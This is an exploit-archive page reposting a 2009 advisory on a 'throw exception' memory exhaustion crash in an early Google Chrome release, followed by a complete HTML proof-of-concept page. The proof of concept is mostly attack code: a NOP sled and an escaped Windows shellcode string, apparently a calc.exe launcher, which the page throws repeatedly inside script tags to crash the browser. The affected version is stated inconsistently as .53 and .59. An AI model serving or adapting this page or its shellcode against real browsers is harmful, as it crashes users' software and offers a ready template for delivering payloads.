首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome version 1.0.154.53 "throw exception" remote crash and denial of se
来源:http://www.secniche.org/gthr 作者:Sood 发布时间:2009-04-29  

Google Chrome 1.0.154.59 "throw exception" Memory Corruption Vulnerability.

Version Affected:
1.0.154.59 . Previous versions are vulnerable too

Description:
The Google chrome browser is vulnerable to memory exhaustion based
denial of service
which can be triggered remotely.The vulnerability is a result of
arbitrary shell code which
 is rendered in a script tag with an exception that is raised directly
with throw statement. It
makes the browser to consume memory thereby impacting the focussed
window and leads
to crash. The impact can be stringent based on different systems.

Proof of Concept:
http://www.secniche.org/gthr

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft
Windows XP SP2
platform.The versions tested are:1.0.154.59

Disclosure Timeline:
Release Date. April 28 ,2009

Credit:
Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time
of publishing based on
currently available information. Use of the information constitutes
acceptance for use in an AS IS
condition. There is no representation or warranties, either express or
implied by or with respect to
anything in this document, and shall not be liable for a ny implied
warranties of merchantability
or fitness for a particular purpose or for any indirect special or
consequential damages.

-------------------------------------------

<html>
<head>
<title>Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service -  </title>
<script language="JavaScript">
 var nop_sled=unescape("%u9090");
 var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
 for(var i=0;i<64;i++){
  nop_sled=nop_sled+nop_sled;
  document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
 }
</script>
</head>
<body>
<center><h1> Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service</h1>
<h2> Executing NOP Sled and Shellcode to create an Exception</h2>

<h2> SecNiche Security (C) Aditya K Sood </h2>
</center></body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Reader javascript getAnn
·Autodesk IDrop ActiveX Remote
·Adobe Reader javascript this.s
·Quick 'n Easy Web Server 3.3.5
·C版本的批量注入代码工具 Inject
·Symantec Fax Viewer Control 10
·webSPELL <= 4.2.0d Local File
·Baby Web Server 2.7.2.0 Arbitr
·VisionLMS 1.0 (changePW.php) R
·mpegable Player 2.12 (YUV File
·Linux Kernel 2.6.x SCTP FWD Me
·Adobe Reader 8.1.4/9.1 GetAnno
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved